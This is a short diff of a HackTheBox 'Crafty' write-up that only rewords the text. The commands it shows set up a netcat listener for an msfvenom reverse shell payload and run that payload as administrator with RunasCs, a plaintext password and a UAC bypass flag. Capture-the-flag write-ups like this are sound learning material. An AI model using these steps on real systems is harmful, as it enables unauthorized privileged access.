K-Scorpio/scorpiosec/content/en/posts/HTB-Crafty.md

 ![malicious file and runascs.exe on target](/images/HTB-Crafty/files-on-target.png)

-We setup another listener on the port selected for your `msfvenom` payload.
+We setup another listener on the port selected for the `msfvenom` payload.

 ```
 rlwrap -cAr nc -lvp <PORT_NUMBER>
 ```

-We then use `runasCs` in conjunction with the payload.
+We then use `runasCs` in conjunction with the malicious file.

 ```
 .\runasCs.exe administrator s67u84zKq8IXw shell.exe --bypass-uac